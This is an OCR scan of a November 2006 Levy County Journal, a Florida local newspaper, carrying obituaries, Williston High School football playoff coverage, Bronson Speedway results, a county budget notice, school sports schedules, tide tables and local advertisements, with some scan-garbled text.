Funeral Services of Chiefland. Carla Swails Carla Swails, 65, of Cross City died Wednesday, Nov. 8, 2006 at her home. She was born and reared in Trenton and moved to Cross City three years ago. She was, a member of New Prospect Baptist Church, she loved crafts and sewing and she was also an accomplished pianist. She is survived by her mother, Ollie Mae Hardee of Trenton; son, Del Swails of Cross City; sister, Lillie Barron of Trenton; two grandchildren and five great-grandchildren. She was preceded in death by her husband, Edsel D. Swail Sr. and brothers, Frank Gray Deen and Joseph Aubrey Deen. Funeral services were held Nov. 11 at New Prospect Baptist Church with the Rev. Billy Robson officiating. Burial followed at Bethel Baptist Church Cemetery in Trenton. Arrangements were under the care of the Rick Gooding Funeral Home, Cross City. Barbara Lynn "Bobbe" Williams Barbara Lynn "Bobbe" Williams of Old Town died at her residence on Saturday, Nov. 11, 2006. She was 58. She was born in Franklin, Penn. and was a homemaker and beautician. She enjoyed fishing, gardening, decorating and enjoyed the outdoors and the sun. Survivors include her husband, Glenn Williams of Old Town; her parents Douglas and Catherine Stewart of St. Cloud; two daughters, Shoni Stewart of Kissimmee and Amy Williams of Kissimmee; one son, Brian Williams of St. Cloud; two granddaughters, JingerLynn Steward of Old Town and Madysen Williams of St. Cloud; and one grandson, Trent Meets of Kissimmee. Memorial services are planned and will be announced at a later date. Arrangements were- by Hiers-Baxley Funeral Services, Chiefland. Photographs are published at no charge with obituaries. Ask your funeral director for assistance. Thig abut CurpeC? Efor csmnider tha Eventosu" Bect o dTILEY VisitourModem Showroom Today tosee allthelatestin Tiledesign. Over500stylesof wall & 5000floor tilesamplesto choosefrom. WHOLESALE TULE 810 East Thrasher The Yellow Building on RT 24 352-486-0063 Porcelain/Ceramic/Marble/Granite Kitchen Backsplash and Countertops Contractor Discounts/Setting Materials and Tools Largest Selection Around at Unbeatable Prices Mon-Fri am-6pm Saturday 9am-4pm o New Monthly Clients Welcomed ! 712 North Main Street, Chiefland 493-4996 BOAT INSURANCE - Did you know 96% of adults believe an attractive smile makes a person more appealing to the opposite sex, thiefland (352) 493-1416 B~j______________Csp Personal Commercial Randy Stefanelli Agency 493-2016 I I THURSDAY, NOVEMBER 16, 2006 age 8 LEVY COUNTY JOURNAL SPORTS & RECREATION Red Devils swim easily out of Shark Tank BY NEAL FISHER SPORTS WRITER BROOKSVILLE- Williston scored a decisive opening round playoff victory against a talented Nature Coast team as they came, they saw and they walked out of Shark Tank Stadium with a 26-13 victory. But for the first quarter, the Red Devils seemed destined to struggle to keep up with their opponents'version ofthe option offense. In fact, at the end of the first 12 minutes, it appeared the game's outcome. would hinge on whether or not the Red Devils could match the Sharks touchdown for touchdown. "We've seen big plays to start games before," Williston coach Jamie Baker said. "The key is to keep the team confident and realize that there is a still a lot of game left to play. After the first couple of series, the defense really locked them down. "We put eight men in the box and while they still got their yards, it didn't hurt us. And when our defense plays well it takes a lot of pressure off of the offense. They can relax and it allowed us to get the option working." And after the Red Devils' answer to an 80-yard scurry by the Sharks' freshmen running back Tevin Drake on the first play from scrimmage was a Rodrigo Quezada's field goal, the answer at that point was no. Then the Red Devils quickly found themselves in the position of struggling to match the home team's play and scores as the Sharks' Josh Ortiz completed a bullet pass to Stephen-Pelaez-on fourth- and-goal from the Williston 15 for a touchdown and the home team followed it with a defensive stop. Fortunately for Williston, Baker's coaching that the game is four quarters long rang true as two plays in the early part of the second period gave the Red'Devils the opportunity to reinsert their will and game plan. With the Red Devils forced to punt after the Sharks' second score and trailing by a score of 13-3, Nature Coast committed a roughing the kicker penalty. With new life and the ball now at midfield, the Red Devils' get up and go, which had been so crucial during the regular season, forced its way into the game. It was highlighted by sophomore Courtney Days coming of age performance. The flurry of punches, which the Red Devils quickly and directly unleashed, resulted in 23 unanswered points. It began with Days ripping off a 45-yard flash and dash. Following his blocking around the right end of the line, he busted through Journal photo by NealiFisher THE RED DEVILS' defense ran the Sharks' offense inside out as they shut down the home team's running game. the first wave of the defense, his legs shifted into fifth gear .and the play continued all the way to the Sharks' 6-yard line. On the next play, Mario Brown scored when the Red Devils went around the right end again. Six plays later, Drake fumbled the ball as the Williston defense, agitated by their early struggles, swarmed the running back and separated him from the ball with vigor. With a new spirit and conviction the Red Devils went on a 10-play, 69- yard tear, which saw ball carriers break tackles and the offensive line put their mark on the game. The Red Devils made the most of the occasion by taking the lead for good with 2:34 left as Days struck from' 14.-yards out .for. hi s eerii touchdown. Once again the play developed as it moved around the right side of the line. "The offensive line blocked really well," quarterback Devin Timmons said. "They are healthy and showing that they can block. We knew Days was going to be good. We watch and play with him during practice. "He always does well and with Minor playing less because of a knee injury we felt comfortable he would come through. I think we might have just wore them down with the running and our defense really motivated us." After gaining the lead, the Red Devils' defense neutralized Ortiz and Drake's fondness for making the big play. The defense forced five turnovers during the game, but four of them came in the second half. Days' older brother, Courtney, recovered two fumbles. But perhaps the most crucial of the turnovers came with 10:56 left in %he game., Ortiz dropped back to pass from the Sharks' 11. Williston's defense mauled the Sharks' offensive line and forced the quarterback to roll to his right. Under pressure, he threw the ball just a tad w ~. Journal photos by Neal Fisher HEAD COACH Jamie Baker, left, stalks the sidelines as his team rips off 27 con- secutive points while the Red Devils respond to the always animated instruc- tions of Coach Alan Baker, right. bit too high for his intended receiver, Preston Williams. The receiver touched the ball with his fingertips, but could not get a grip on it. The result was a tipped ball. Jiwan James had positioned himself in the right place at the right time and snagged the ball out of the air. He continued in full stride down the right hash mark the remaining 23 yards and entered the end zone untouched. With the jaw dropping play, the lead grew to 26-13 and the Sharks were all but done. The play was the fifth score of the season by the Red Devil's defense. "He [James] didn't have coverage responsibilities but he used his instincts," Baker said. "He simply makes plays." Williston's other score was a second 33-yard field goal by Quezada with 8:30 left in the third quarter. It extended the Red Devils' lead to 19-13. The kicker also booted four kickoffs into the end zone, helping Williston gain the field position advantage. While Williston committed its share of game changing miscues, Baker acknowledged it boded well for his team that their turnovers were not in their end of the field. However, Nature Coast's turnovers were in the Shark's end of the field. Drake finished with 20 carries for 126 yards, but the Red Devils got another boost as they shut him down after his touchdown run. After carrying the ball only 21 times for 98 yards on the season, the -fobt-10, 170-'' pound Days proved his team's versatility in its backfield and his readiness to step into the limelight. His final totals were 16 rushes for a game- high 160 yards. In wearing the Sharks' defense down, the Red Devils saw a repeat of what he has done all season. However, he answered the question of See Win Page 9 NOTICE OF BUDGET AMENDMENT HEARING The Levy County Board of County Commissioners will hold a public hearing November 21, 2006 at 9:00 A.M. in the County Commissioners Meeting Room, Levy County Courthouse, 355 S. Court Street, Bronson, Floridafor the purpose of amending its FY 2005/2006 Budgets for the General Revenue Fund, 911 Fund, Housing Recovery Fund, Fire Control Fund, and the Additional Court Cost Fund. Journal pnoio Dy Neal i-Isner IT WAS a hard day's night for Courtney Days. In theend though his performance was a:masterpiece. ESTIMATED REVENUES: TAXES LICENSES INTERGOVERNMENTAL CHARGES FOR SERVICES 1 FINES/FORFEITURES MISCELLANEOUS LESS: Statutory Reserve TOTAL ESTIMATED REVENUES NON OPERATING REVENUES Interfund Transfers CASH BALANCES FORWARD TOTAL REVENUES & BALANCES EXPENDITURES & RESERVES GENERAL GOVERNMENT PUBLIC SAFETY PHYSICAL ENVIRONMENT TRANSPORTATION ECONOMIC ENVIRONMENT HUMAN SERVICES CULTURE/RECREATION COURT RELATED TOTAL OPERATING EXPENDITURES NON-OPERATING EXPENDITURES Interfund transfers RESERVES TOTAL EXPENDITURES,TRANSFERS & RESERVES General Revenue Fund 16,988,678 341,000 2,568,112 455,000 .22,000 549,455 (1,046,212) 19,878,033 Housing Fire 911 Recovery Control Fund Fund Fund 0 0 378,670 160,000 0 3,565 (27,112) 515,123 0 0 538,000 0 0 3,500 (27,075) 514,425 261,847 0 4,085,248 .248,000 0 0 0 0 0 676,000 (33,800) 642,200 0 25,000 Additional Court Cost Fund 0 0 0 46,400 0 0 (2,320) 44,080, 0 0 17,000 100,873 24,225,128 763,123 514,425 684,200 144,953 4,724,174 1,271,790 445,624 0 211,330 1,874,104 966.998 150,200 0 530,495 0 0 0 0 0 0 0 0 0 0 514,425 0 0 0 0 684,200 0 0 0 0 0 0 0 0 0 0 0 0 0 49,234 9,644,220 530,495 514,425 684,200 49,234 13,322,355 232,628 1,258,553 0 0 0 95.719 0 0 0 24,225,128 763,123 514,425 684,200 144,953 Journal photo by Neal -isher EVEN A BOTCHED snap on a PAT attempt failed to stop the Red Devil Express once it got rolling. Complete details of the amended budgets are available for public Inspection at the Office of the Clerk of the Court, Levy County Courthouse, 355 S Court Street, Bronson, Florida. Persons are advised if they decide to appeal any decisions made at these meetings/hearings, they will need a record of the proceedings and for such purpose, they may need to insure that a verbatim record of the proceedings is made, which includes testimony and evidence upon which the appeal is to be based. LEVY COUNTY JOURNAL SPORTS & RECREATION THURSDAY, NOVEMBER 16, 2006 Game of the Week Williston (8-3) vs. Eustis (9-2) 2005 score: did not play Overview: Both teams played well during the second half of their first round playoff games last week to advance. Also, after both teams advanced to the second round of last year's playoffs, they entered this season's post season as stronger and more experienced units. What the teams learned from last year's rin was apparent last week as both teams rallied after falling behind early. They remained cool, calm and didn't panic as they worked out the kinks of getting their playoff legs under them. However, because of their loss to North Marion, Williston will be playing their second consecutive game on the road as a district runner up. By all accounts, as one would expect at this point in the season, these two teams, although using different running styles, are evenly matched and this should be a close game. Williston update: Williston used their regular season finale against Newberry to regain the momentum they had built throughout the first eight games of the season and they carried it into their first round date. While it took about a quarter for the offense to find fiftli gear and the defense to put the clamps on the Sharks' offense, coach Jamie Baker's squad got on a roll and looked as good as they have all season. While their victory over the Panthers was far from a masterpiece, Williston played Red Devils' football and it showed just how potent an attack they have, both on offense and defense. The offensive and defensive lines are peaking ,at just the right time of the season. While the Red Devils ar still having issues with slow starts and fumb e t impact on the outcome of the game has been minimal. Baker pointed out that his team's experiences over the last two years have been the difference in those situations. Coach speak: "This gives the kids an eight win season. So they are really motivated to win, because it is the first time in a really long time the school has had this many victories. A game like this lets the state know Williston can play some football. Turnovers loomed large (against Nature Coast) and they will continue to loom large. I hope we don't fall behind, but the kids realize it isn't the end of the world. "Eustis is a run oriented team like us. They move well and are athletic. Their line-up is very speedy and that is how they overcome their lack of size." What to look for: As is the case in any sport on any level, the playoffs means the teams who qualify for post season like to dance with the girl they brought to the big event. This means there isn't a lot of surprises as to what the remaining teams will do and they will rely on their strengths in their simplest forms. By Neal Fisher Levy County Journal Or in other words both teams will throw their best punches and see who is still standing at the end of the day. 'For the Red Devils that is their noted option offense and a speed demon defense which causes quarterbacks into hurrying their decisions. For the Eustis Panthers, they counter with a multiple formation offense that relies on misdirection and a 4-3 defense utilizing their speed as they force the action to the middle of the field. The Red Devils offense has been productive throughout the 2006 season. Propelled by its speed, the option running attack gained 251 yards in their first round victory and it seems to have come of age in the last few weeks. The Red Devils also move the ball using their speed. And as coach Baker alluded to, the passing attack is efficient enough to keep defenses off balance and gain big yards in one fell swoop as their two completions against Nature Coast attest to. Add to that the Reds Devil defense's ability to use their speed to shut down opponents' offenses and create chaos in the backfield and Williston seems to be hitting their stride at exactly the right time. In fact, the Red Devils 'defense has scored 35 points this season. . There isn't much surprise as to what the Red Devils will try to do against Eustis, but coach Baker and his staff have been good at making adjustments throughout the season. Eustis presents an offense different than what thq Red Devils have seen all season and adjustments will probably be needed. While not willing to discuss the situations that may require the coaches having to anticipate making those adjustments, the team has confidence they can translate the changes into on the field success. With Deonte Welch and Ivan Floyd filling in for injured players, the Red Devils have yet to miss a beat. Together the two freshmen made significant contributions over the last two weeks and proved the Red Devils' program can sustain player losses. However, Marquis Minor is expected to see more playing time this week. In his steed, Courtney Days and Welch gave Newberry and Nature Coasts fits. With Minor back, Eustis will have to figure out a way to keep an eye on not just one runner, but all three backs and limit their yardage. While hard work is required to learn the scheme and play at the same level as their predecessors, the running backs who replaced the opening day starters are so alike the team has been able to continue to gain yards. The running attack has also continued to roll throughout the season, because of its offensive line. Throwing its speed around, it drives opponents off of the ball before they can gain their footing and creates those holes the backs run through. Anatomy of a playoff victory This week's Friday night under the lights. Athlete of the Game BY NEAL FISHER SPORTS WRITER Player of the game last week was Courtney Days- Williston High School (RB). Days, a sophomore, came up: big for the Red Devil in their biggest game of the season. He rushed the ball 16 times for 160 yards and a touchdown as Williston. rallied from an early 10-point deficit to score a first round victory over Nature Coast. The sophomore made the most of his opportunities in spot duty during the regular season, but with Marquis Minor seeing limited action and the Sharks' defense challenging Days to beat them, he rose to the occasion in his first game as the team's BY NEAL FISHER SPORTS WRITER Final Score: Williston 26 Nature Coast 13 Two games in One: The Sharks stakedthemselves to a 13-3 lead midway through the second quarter. But the Red Devils outscored, the home team 23-0 for the last two and half quarters to claim victory. Game summary: After giving up long plays the first two times the Sharks took possession of the ball, which led to touchdowns, the Red Devils' defense stymied their option attack. Key Plays: 1) The Sharks committed a roughing the punter penalty at 11:35 of the second quarter after they had stopped the Red Devils from answering their second score. 2) The Sharks then fumbled the ball at 7:05 of the second quarter after the Red Devils took advantage of the roughing the punter penalty by scoring. 3) Jiwan James in full stride picked off a tipped pass and returned it 23 yards for a touchdown at 10:56 of the fourth quarter. Why they were key plays: 1) The Sharks offense scored two touchdowns on their first two possessions. With their defense holding the Red Devils to a lone field goal heading into EWin the second quarter, the Sharks were poised to put Williston in a hole that would have been very difficult to overcome. The roughing the punter penalty allowed the Red Devils to regroup and snapped Nature Coast's stranglehold on stopping Williston's offense up to that point in the game. 2) After the Red Devils scored 'following the roughing the punter penalty, the Sharks still had the lead and they were still moving the ball. With the fumble, the Red Devil defense got the break they needed to stop the Sharks' offense and was proof that they had found the right adjustments required to stop the home team offense. 3) The Red Devils were sitting on 19-13 lead and while they had shut down the Sharks' offense since the second quarter fumble, it was still capable of scoring. With James' interception it gave the Red Devils a two-touchdown lead, allowing, the visitors more freedom in their play and the comfort of running time off the clock without worrying about giving up the lead. Key defensive stat of the game: The Sharks turned the ball over four times on their own side of the field. While the Red Devils had five fumbles of their own, they recovered all of them and the potential disasters were on the opponents' side of the field. Also four of the Red Continuedfirom page 8 mairiian'as opposed to being called upon for spot duty. "My hat goes out to them [Williston]," said Nature Coast head coach Jamie Joyner. "We turned.the ball over and they took advantage. That's what playoff football is all about." Williston (8-3) takes on Eustis (9-2) on the road in the second round of the playoffs tomorrow. G.am -Summary Wlllston -.. 3, 13 3 .7 .26 Nature CasA. i13 0; 0 0 13 O ar er '" '.. Iatu'e Cobst Drake 80-yard run (kick good) Winiston Quezada 36-yard Field Goal Ntfuri6"Coaa Pele15 yardc touchdown pass from Ortiz (kick failed :., 2nd Qurt. .. ,. WIistn Brown 6-yard run (2 point attempt failed) SWlilston Courtney Day 14-yard run (kick good) 3" Quarter " Williston,'Qufezada 32-yard Field Goal ,,.4 Quarter -.: -' Wilistonr- Jametr23-yard Interception return (kick good) ta.. ,7.* , S is i W~lf stl 43,251, Days 16-160, Timmons 12-52, Minor -7-m2?, Brown 8-14; Floydid3, Welch 4-1 Pasig; WihAfson 29-s0-0-0, Timmons 2-9-50-0-0 Rebaiving: Williston 2-50, Whilden 1-16, Welch 1-33 SEquipment, Inc. Come-in and see or aRI L John about all your ; OUTDOOR Eo oioPnwr " POWR Phone: 352-493-4121 Fax: 352-493-9100 I 107 SW 4th Ave. Chiefland, FL. 32644 ..'oiuthequipment.com Ir//l_,./,'l, ,^3 Building and Development Your Custom Home Specialist Locally Owned and Operated By Steve and Karen Smith Office: (352) 486-4290 Mobile: (352) 538-1388 or (352)-538-3141 stevesmithconst@aol.com AIN\ Personal Attention Xi Quality Craftsmanship & Materials ) Framing and Concrete Finishing Page 9 Devil's fumbles were in the second half, long after they had taken command of the game. Key offensive stat of the game: Courtney Days took over the majority of the rushing duties, due to a knee injury to Marquis Minor. With 16 rushes for 125 yards, the Red Devil were able to give Minor some much needed rest and gave the Sharks yet another style of running to contend with. Factors that produced the 23 unanswered points: 1) Both of the Red Devils' offensive touchdowns were scored running the ball behind the right side of the ball. In fact running the ball to the right side of the line was so productive the Red Devils gained approximately three quarters of their yardage running the ball to that side. 2) After giving up the two scores in the first half, the Red Devil defense settled down and caused all kinds of havoc for the. Sharks' offense, including over 10 hurries by their all- district quarterback and the turnovers. 3) With James' interception giving the Red Devils a 13-point lead as the fourth quarter waned down, Williston did not attempt one pass while they successfully ran the clock out. Congratulations Red Devils on your ,first playoff victory. Hit 'em hard Friday in Eustis! "Let it be said"m I Page 10 LEVY COUNTY JOURNAL SPORTS & RECREATION THURSDAY, NOVEMBER 16, 2006 Bronson Speedway ends season with metal twisting affair BY NEAL FISHER SPORTS WRITER BRONSON-Fans packed the Bronson Motor Speedway on Saturday night as a slight chill in the air combined with the disposition of the night to send the 2006 season into the history books with style. Highlighted by its annual end of the season crash-o- rama, the 2006 finale was a slam-bam fender grinding and sheet metal twisting affair that saw everyone get something for their money. "It was a great show for the fans," Tommy Dunford, general manager of the track, said. "We thank Boondocks SGrill for supporting us and the drivers and fans who also supported us during the 2006 season." The events ranged from the annual crash-a-rama to some of the sport's more unique and lesser known races. Which brings up the question of why someone would think of them and who would imagine sending these machines into this kind of combat? However, in the spirit of Veterans Day, before any of the festivities began, our nations' veterans and those currently serving in the military were honored. Robert E. Lowyns of the Tri-County Marine Corps League and Keith Griffin of the National Guard were introduced during the presentation of our nation's flag and the national anthem. Cub Scout Troop 514 of Chiefland did the honors of holding the flag while saluting it along with the two servicemen. With such a variety of oddities and novelties, the whirl of f-stops and flashes took center stage in the stands as the competitors put on a show of determination and excitement. The program snaked its way through an assortment ofunique races having just about anything to do with the outdoors or the world of industry. The showpiece of those kinds of races was the figure 8 school bus contest. Tucked in between the daredevils' attempts for one last grasp at glory this season was an exhibition jump, spin out competition and the recognition of the speedway's 2006 champions. But perhaps the line-ups biggest attention came to the monster rally. Three trucks wowed and awed the crowd with a variety of moves over, under and through the dirt piles and destroyed cars. "The Monster Truck show was awesome," Dunford said. "It really stood out to watch what those machines can do." This was after the audience had a chance to survey the machines and form their opinion first hand at the graceful power of the oversized trucks before the steel pounding action began. Added to the festivities of Journal photos by Neal Fisher WELL, THAT'S going to leave a stain. nerves of steel and gambling was the non-racing curiosities that made the night feel like it was a fair, among which was the world's largest pinball machine and cuisine that seemed to makes everyone's taste buds water. When the smoke from the featured slashed and gashed carnage of all kinds and walks of life concluded with the demolition derby, the daredevils called it a night as they rode of into the sunset. But the'most important effect was a season finale that gave everyone a full stomach and smiles as the fans filed out of the speedway. "It was great to see the stands full of fans as the season ended and we are happy with the way it came to a close." Results School Bus Figure 8s 1. Robert Aaron 2. Dave Ross 3. Larry Harris Enduro Winner: William Hinth Roller Derby Winner: A.J. Northrup Skid Car Race Winner: Joe Ringhiesen Boat & Trailer Race Winner: Michael Gamon Blindfold Race: A.J. Northrup Reverse Race: Fred Judy Demo Derby- Dave Westrich THE BRONSON Motor Speedway honored its 2006 Series during intermission. Cooper takes the checkered fla "HEY I thought we took the car to Maaco." After furt was little that could help this machine after the dem Thomas F. Philman, Certified Operator ,f-> PO Box 872 4 South Main S Chiefland, FL 32644 B> Phone: (352) 493-4772 I (352) 493-1051 1-800-242-9224 BY NEAL FISHER SPORTS WRITER OCALA-After a satisfying win at his home track last Saturday night, Robbie Cooper took to the banks of Ocala Speedway looking to close out the track's 2006 season with something to shout about. As the checkers waved, it was mission accomplished for the second consecutive week as Bronson's most famous racing product captured his fifth victory of the season in the track's open wheel modified division. '.'~, "It is always nice to win the last race of the season," :her review, there probably Cooper said. "There is some olition derby. really great competition at Ocala Speedway and to be iig John's Supply, Plumbing, Well, Irrigation, 4 Watersoftners, Iron Filters, 4 Pool Supplies' (35)49650 lw-f.. W U 7 Jim-1C; -J~LIz-L~,.J Ben Detwiler hopeld to make the world a better place, That lope died when he was killed by a drunk driver. What should you do to stop a friend from driving drunk? Whatever you have to, Friends don't let friends drive drunk, 0*t , able to win five times is really an accomplishment. It is just really hard to win there. I think that the competition at Ocala is the best class of modifieds in the state and the track is the hardest to drive." With the victory Cooper moves into the fifth position in the series' final point standings. Being an up and coming driver, he splits his time racing in several series. Due to the different series, the Bronson driver missed several races the series ran and he pointed out that he probably would have finished higher in the point standings. However, he was pleased with his fifth place finish considering it was his rookie Ti es Ta year at the track. Unfortunately, his victory was short lived as he finished a disappointing seventh Saturday night in the race of champions at Desoto Speedway. "It was a real bad night and those kind of nights are going to happen," Cooper said. "All you can do is learn from them and move on. We did learn a lot from the race and hopefully we will be able to put it to good use next year. "We started bad, had trouble in qualifying, but once the race started things started to get better. I thought we might be able to make it See Cooper Page 11 es TI es, Palms, Oaks, Maples, Holies, Myrtles, etc. Ahrohnm Blitch erOff (352) 4939 1 CdeL (3) 535-52 Wwwwjnb "nflfnilr pet 6f ,-& d*Brid iTravertine avers now tvoailable! Service Van Available To Handle Your Plumbing Needs and Make House Calls. Levy & Gilchrist Co. (352) 493-3801 Dixie Co. (352) 498-0703.(352) 210- 0062 SLicensed*Insured'Free Estimates SWalter Freeman State Certified Master Plumber #CF057595 0120 Ll- aF;;Z 24 MinSt LEVY COUNTY JOURNAL SPORTS & RECREATION THURSDAY, NOVEMBER 16, 2006 Aulsons put Black Prong on the market 'Deerly'Departed BY NEAL FISHER SPORTS WRITER BRONSON-Three years ago Maureen and Alan Aul- son bought approximately 90 acres of land nestled inside the Goethe State Forest near the city of Bronson. Originally bought as the Aulson's personal training fa- cility, the couple transformed the land into what is now known as the Black Prong Equestrian Center. The couple made the trans- formation of the land into a public facility due to what became a heavy demand for an equestrian center in the area. Within its short existence, the center has become world renowned and one can find just about every kind of en- tity needed to participate in the sport. Some examples of what exists inside the center are on-site world class trainers, nine regulation-size dressage arenas, practice obstacles, a marathon course, more than 150 miles of trails in the Goethe State Forest and con- venient lodging options. However, even with the pride of building the facil- ity from scratch, the Aulsons have decided to sell it due to Alan's commitment to spend more time in what is know as Journal photo by Carolyn Risner THE SOUTH gate of Black Prong Equestrian Center remains open although its owners are looking for new buyers. horse driving. "The county commission and Levy County in general have been very helpful to us and we are very grateful for it, "Aulson said. "I am sad to let it go, but it is just too much right now with the focus and concentration I need to con- tinue to participate in driving. The area is one of the largest driving communities in the area and we hope to keep the facility in the horse commu- nity." Even though the couple is Keep on Flushing ': A&M Plumbing Enterprises Inc. Remodel, Re-Pipe, New Construction, Mobile Home Hook-Ups and Water Heaters. Serving the Tri-County area. Bronson (352)486-3509. not looking for a particular group or kind of individual as far as to whom to sell the facility to, they are requir- ing that the buyer honors the commitments already made for the 2007 season. The couple has received several phone calls as their weekly newsletter first indi- cated the facility was up for sale. Among the other benefits the facility has brought to the area is an increase in both the value of the real estate and its subsequent development. It also serves as a community oriented location in a coun- ty where few exist at a low price. "I am most proud of it becoming a jewel for the equestrian community and it is a first class facility that can hold world class shows," Aulson said. "We want the' public to know it is a gem in a great community." The Aulsons hold private property and will maintain a residence in the area. Sse UprideV iat D F cS s e Air Codt n & Hetn ALLSASOSHATIG&A/ Stae erifed-AC0542 "YOR OMOR.ISOU-CNCRN 74Ij *1~d324321 Stphn/EWSTNDRD FR IVIG 325230 *6. ** 1a00-42-02 SMnmy - Warradsie & Roadside GRANT COTHRON and his sister Marjorie show off the 8-point buck Grant killed on opening day of hunting season. The buck spread measured 18inches. 1Cooper Continued from page 10 I bounced off of the wall. All in all though, it was a good season and we ended it really strong. That should give us a boost for next season." The number 98 special modified finished the race after his crew made repairs, but without his original chassis intact he limped home to the disappointing finish. Cooper has also seized victories at Orlando Speedworld, Columbia Motorsports Park in Lake City and New Smyrna Speedway this season. He also set the track record at New Smyrna Speedway. 1* *. 1*1*9 4 1 4:- '42- t* I *C- "OP* C- 0 4 I0 Complete Veterinary Services : Ted S.Yoho, DVM Marie Leslie, DVM Jackie Linknus, MRCVS Jill Brady,. DVM Dental Care I Prestrion Food I Grooming !* Vamcclnations Boarding I EarlyAM Drop-Off S IMk: ochip Identiflations I Medidne & Surgery 00 Skidn Disease Treatment I Puppy & Kitten Plan Ur LargeAnknal Haul-In Available * 24 HOUR EMERGENCY SERICE AVAIABLE 91tf 4* 0 E96 d 9- 1-a, n St 11*itaan ^ -* a-*f- ;- s-** a-*f-* 4 *-**a--i"<-*&*- WUF You Tile Best 1 In Town Assistance --u I I I La .I II III *39 month closed end lease. $1625 down plus tax, tag, title $ 399.50 dealer fee. 10,000 mi/yr, $.20/mi for overage. See dealer for details. C;1 11,11 V I I I I I I M IIAI 2WISI /LEASE *39 month closed end lease. $1700 down plus tax, tag, title $ 399.50 dealer fee. 10,000 mi/yr, $.20/mi for overage. See dealer for details. L,:k4 I-a i all I' $ -I III I MO. ,at_- l'- 'm:LAS- - *39 month closed end lease. $1676 down plus tax, tag, title $ 399.50 dealer fee. 10,000 mi/yr, $.20/mi for overage. See dealer for details. *39 month closed end lease. $1875 down plus tax, tag, title $ 399.50 dealer fee. 10,000 mi/yr, $.20/mi for overage. See dealer for details. *39 month closed end lease. $1600 down plus tax, tag, title $ 399.50 dealer fee. 10,000 mi/yr, $.20/mi for overage. See dealer for details. $39 MO. *39 month closed end lease. $1600 down plus tax, tag, title $ 399.50 dealer fee. 10,000 mi/yr, $.20/mi for overage. See dealer for details. E i Vehicles subject to prior sale due to aggressive pricing and early print deadlines. Prices subject to change due to manufacturers incentives. Pictures are for illustration purposes only. Dealer not responsible for typographical errors. Sorry,all prior sales excluded. E AGLE BU ICK GMC Mon-Fri: 8:30-83 Sat: 8:30-6 Sun: 11-3 Inglis Dunnellon EAGLE BUICK GMC aI3 ICrsal 1275S. Suncoast Blvd. (US 19)* Homosassa, FL 34446 EAGLE 1-352-795-6800 1-888-745-2599 guMc- s Homosassa Hv 98 I A Page 11 -i I I It Page 12 LEVY COUNTY JOURNAL SPORTS & RECREATION THURSDAY, NOVEMBER 16, 2006 First-year coach throws in the towel r BY NEAL FISHER SPORTS WRITER CHIEFLAND-Five months ago, Bobby Rast took over the Chiefland High School football program amidst the controversy that was the firing of his predecessor. And after one season and what seemed to be a rash of negative perception concerning how he was handling the rebuilding of the once proud Indians' program among the school's staunchest followers, Rast resigned. In what turned out to be Rast's only season at the helm of the Indians' program the team fell to its worst record in over two decades, winning its lone game on homecoming night. That win came against Crescent City and spurred hope that perhaps the program was starting to bear the fruits of Rast's injection into it. .However, the team failed to respond and lost its last four games by a combined 180-39 score. al m ly he as ;n 4, L Williston High School Varsity Football Friday 11/17 Eustis 2nd round FHSAA playoffs Girls Soccer Monday 11/20 @ P.K. Young Tuesday 11/28 @ Fort White Wednesday 11/29 @ Interlachen Friday 12/1 @ Newberry Monday 12/4 Hawthorne Friday 12/8 P.K. Young Men's Varsity/J.V. Basketball Friday/Saturday 11/17-18 Tip Off Classic @ Chiefland. Tuesday 11/21 Eastside Tuesday 11/28 @Newberry Friday 12/1 @Chiefland Tuesday 12/5 @ Dixie County Friday 12/8 P.K. Young Saturday 12/9 Daytona Beach Shootout @ Daytona (J.V.) Girls Varsity/J.V. Basketball Thursday 11/16 @ St. Francis Red Devil Final Regular Rushing Minor Evans. White Timmons Days Cox Brown Welch Floyd Totals Attempts 99 73 60 101 26 12 10 10 1 392 Passing Completion Com Timmons 57 Total 57 Receiving Rec J. James 20 White 7' M Brown 11 Welch 3 Evans 6 T..Brown 3 C.J. James 3 Floyd 1 Whildon 3 Totals 45 Yards 575 387 358 325 101 43 42 0 0 1831 Catholic Monday 11/20 @ The Rock Tuesday 11/21 Interlachen Tuesday 11/28 Chiefland Thursday 11/30 Hawthorne Friday 12/1 Ft. White Tuesday 12/5 @ Newberry Thursday 12/7 Dixie Count4 Bronson High School Boys Varsity/J.V. Basketball Tuesday 11/21 Newberry Tuesday 11/28 @ Bell Friday 12/1 @ Dixie County Saturday 12/2 Oak Hall Tuesday 12/5 @ Branford Friday 12/8 @ Trenton Saturday 12/9 @ Hawthorn Tuesday 12/12 @ Mayo Friday 12/15 Williston Girls Varsity Basketball Friday 11/17 @ St. Francis Tuesday 11/21 @ St. John- Tuesday 11/28 @ Bell Season Statis Att Yards 115 1377 115 1377 Yards 488' 202 213 129 97 75 77 13 83 1377 Tides for Cedar Key starting with Nov. 16 Day High Tide Height Sunrise. Moon Time % Moon /Low Time Feet Sunset Visible Th 16 Low 4:47AM 0.6 6:57 AM Rise 3:05 AM 21 16 High 11:00AM 3.0 5:37PM Set 3:09PM 16 Low 4:50PM 1.1 16 High 10:44 PM 3.4 F 17 Low 5:32 AM 0.2 6:57 AM Rise 3:57 AM 14 17 High 11:52 AM 3.1 5:37PM Set 3:35 PM 17 Low 5:29PM 1.2 17 High 11:14PM 3.6 Sal8 Low 6:12AM -0.1 6:58AM Rise 4:51AM 8 18 High 12:39 PM 3.2 5:36 PM Set 4:04 PM 18 Low 6:05 PM 1.3 18 High 11:44 PM 3.7 Su 19 Low 6:49AM -0.4 6:59AM Rise 5:47 AM 3 19 High 1:21 PM 3.2 5:36PM Set 4:36 PM 19 Low 6:39 PM 1.4 M 20 High 12:13AM 3.8 7:00AM Rise 6:46AM 0 20 Low 7:25 AM -0.5 5:36PM Set 5:14 PM 20 High 2:02 PM 3.2 20 Low 7:14 PM 1.5 Tu21 High 12:43 AM 3.9 7:01 AM Rise 7:47 AM 0 21 Low 8:01 AM -0.6 5:35 PM Set 5:58 PM 21 High 2:43 PM 3.1 21 Low 7:49 PM 1.6 W 22 High 1:15AM 3.9 7:01AM Rise 8:48AM 1 22 Low 8:39AM -0.6 5:35 PM Set 6:50 PM 22 High 3:24 PM 3.0 22 Low 8:26 PM 1.7 Monday 12/4 Seven Rivers Tuesday 12/5 @ Branford Friday 12/8 @ Trenton Tuesday 12/12 @ Mayo Thursday 12/14 The Rock Boys/Girls Middle School Basketba Monday 11/27 @ Bell Thursday 11/30 @ Trenton Saturday 12/2 Oak Hall (Boys) I Tuesday 12/5 @ Yankeetown Thursday 12/7 Chiefland Tuesday 12/12 Yankeetown Thursday 12/14 The Rock (Boys) 